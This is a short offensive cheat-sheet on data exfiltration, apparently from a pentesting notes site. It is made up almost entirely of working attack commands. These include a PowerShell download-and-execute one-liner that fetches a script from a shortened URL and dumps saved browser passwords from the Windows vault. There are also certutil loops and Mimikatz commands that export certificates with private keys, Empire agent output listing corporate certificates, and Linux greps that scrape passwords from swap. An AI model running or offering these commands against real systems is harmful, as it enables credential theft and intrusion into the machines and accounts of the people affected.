Link to this headingExfiltration

Data Exfiltration

Link to this headingWindows

Credentials from IE and Edge:

# Usage: powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/2K75g15’)" [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Source

Listing Certificates:

Get-ChildItem -Path 'Cert:\CurrentUser\My'

Dumping Certificates:

Get-ChildItem -Path 'Cert:\CurrentUser\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") } (Empire: PBDGVXBKMKM3VRTH) > shell Get-ChildItem -Path 'Cert:\CurrentUser\My' (Empire: PBDGVXBKMKM3VRTH) > Directory: Microsoft.PowerShell.Security\Certificate::CurrentUser\My Thumbprint Subject ---------- ------- 9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA CN=user1@corp.com 74B8E1DE4D2CD35A242FC3452E0EE73FDFBE1A6A CN=911259, OU=People, O=Group 714B276BE0EB8C6B19157691899CC4CCA2F0B265 CN=2014-2029 Dev Root, O=Dev 708411B08CA25B987B94E229D50E1862DCDDACF8 CN=user2@corp.com 6FCDF1A4DF6DA730386D6DD1041D41618A7E08FB CN=CC2 Dev Team, OU=iOS, OU=BYOD, OU=CIB, O=Group 66379C02D31D081574746B2FB95AF6ABF6D9740D CN=911259, OU=People, O=Group 58369F020338A78D2B3A043F2963448A24A4ED97 CN=user3@corp.com 4FD61287C53BD30F12A90B1851ED35FF021EC5F0 CN=911259, OU=People, O=Group 3D3E74F2F1132FB82584D762FDFBD849524A0EAB CN=2014-2029 Dev Mobile Devices, O=Dev 30089099A9717A5D7FA685F6FA53434B3BD07BF9 CN=911259, OU=People, O=Group certutil.exe -exportpfx 9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA foo.pfx (Empire: credentials/mimikatz/command) > set Command crypto::capi privilege::debug crypto::cng "crypto::certificates" Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export" Get-ChildItem -Path 'Cert:\localmachine\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { &certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") } set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export" set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:my /export" set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:my /export" privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"

Link to this headingLinux

Get Creds from Swap:

strings <swap_device> | grep "&password=" strings <swap_device> | grep -i 'email=' | grep @ | uniq # etc...

Gets Creds from SSH sessions:
Tool for extracting information from newly spawned processes